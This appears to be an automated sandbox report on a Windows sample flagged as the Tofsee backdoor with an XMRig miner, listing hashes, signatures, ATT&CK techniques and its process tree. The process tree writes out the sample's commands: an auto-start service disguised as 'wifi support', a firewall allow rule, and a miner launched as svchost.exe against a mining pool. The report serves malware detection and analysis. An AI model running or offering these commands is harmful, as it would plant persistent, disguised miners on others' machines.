Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    28-12-2020 16:47

General

  • Target

    SecuriteInfo.com.BehavesLike.Win32.Generic.cc.20618.exe

  • Size

    171KB

  • MD5

    000b21a6ac8f5d5fa950eed455556dd2

  • SHA1

    fe11975ba2efbc981619ea51f0875e65598a1daf

  • SHA256

    91568fbf16eb6e6c8e6e633163ef0ff94ca4956195438c61d1023614d6f18fa5

  • SHA512

    5205e5078bbb66f543541f7af3f463ea948c2c76df3d8fb4d4e1e50ef5dd2cd28352a9c73787d73d8a0996dce2d981ba03ca55ea342615df39e12510bbfe460f

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.cc.20618.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.cc.20618.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kpecogmh\
      2⤵
        PID:1924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mhldtege.exe" C:\Windows\SysWOW64\kpecogmh\
        2⤵
          PID:1032
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kpecogmh binPath= "C:\Windows\SysWOW64\kpecogmh\mhldtege.exe /d\"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.cc.20618.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:224
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description kpecogmh "wifi internet conection"
            2⤵
              PID:1364
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start kpecogmh
              2⤵
                PID:2536
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2084
              • C:\Windows\SysWOW64\kpecogmh\mhldtege.exe
                C:\Windows\SysWOW64\kpecogmh\mhldtege.exe /d"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.cc.20618.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3936
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3208
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3484

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\mhldtege.exe
                MD5

                e2c1a0f67ab2256624da78ee1e35b48f

                SHA1

                79d7bc0572d6d00b27290cabc8a3e8ef1287575d

                SHA256

                dba844f97d5344fae6afedb99dca55eab8eb434b92b6d18e95d78f76eed26046

                SHA512

                cf31ae2705d5d9b3e86331fba1ab9551a878888a8f453c8e4c583ad4c0ffa4a6650a14d17345d94d496d69bdb2f276d97c097e833ef5dad1782279ac462b3f71

              • C:\Windows\SysWOW64\kpecogmh\mhldtege.exe
                MD5

                e2c1a0f67ab2256624da78ee1e35b48f

                SHA1

                79d7bc0572d6d00b27290cabc8a3e8ef1287575d

                SHA256

                dba844f97d5344fae6afedb99dca55eab8eb434b92b6d18e95d78f76eed26046

                SHA512

                cf31ae2705d5d9b3e86331fba1ab9551a878888a8f453c8e4c583ad4c0ffa4a6650a14d17345d94d496d69bdb2f276d97c097e833ef5dad1782279ac462b3f71

              • memory/224-7-0x0000000000000000-mapping.dmp
              • memory/1032-5-0x0000000000000000-mapping.dmp
              • memory/1156-2-0x0000000005086000-0x0000000005087000-memory.dmp
                Filesize

                4KB

              • memory/1156-3-0x0000000005620000-0x0000000005621000-memory.dmp
                Filesize

                4KB

              • memory/1364-8-0x0000000000000000-mapping.dmp
              • memory/1924-4-0x0000000000000000-mapping.dmp
              • memory/2084-11-0x0000000000000000-mapping.dmp
              • memory/2536-9-0x0000000000000000-mapping.dmp
              • memory/3208-14-0x0000000000420000-0x0000000000435000-memory.dmp
                Filesize

                84KB

              • memory/3208-15-0x0000000000429A6B-mapping.dmp
              • memory/3208-17-0x0000000004240000-0x000000000444F000-memory.dmp
                Filesize

                2.1MB

              • memory/3208-18-0x0000000000490000-0x0000000000496000-memory.dmp
                Filesize

                24KB

              • memory/3484-19-0x0000000000800000-0x00000000008F1000-memory.dmp
                Filesize

                964KB

              • memory/3484-21-0x000000000089259C-mapping.dmp
              • memory/3936-13-0x0000000005340000-0x0000000005341000-memory.dmp
                Filesize

                4KB

              • memory/3936-12-0x0000000004F61000-0x0000000004F62000-memory.dmp
                Filesize

                4KB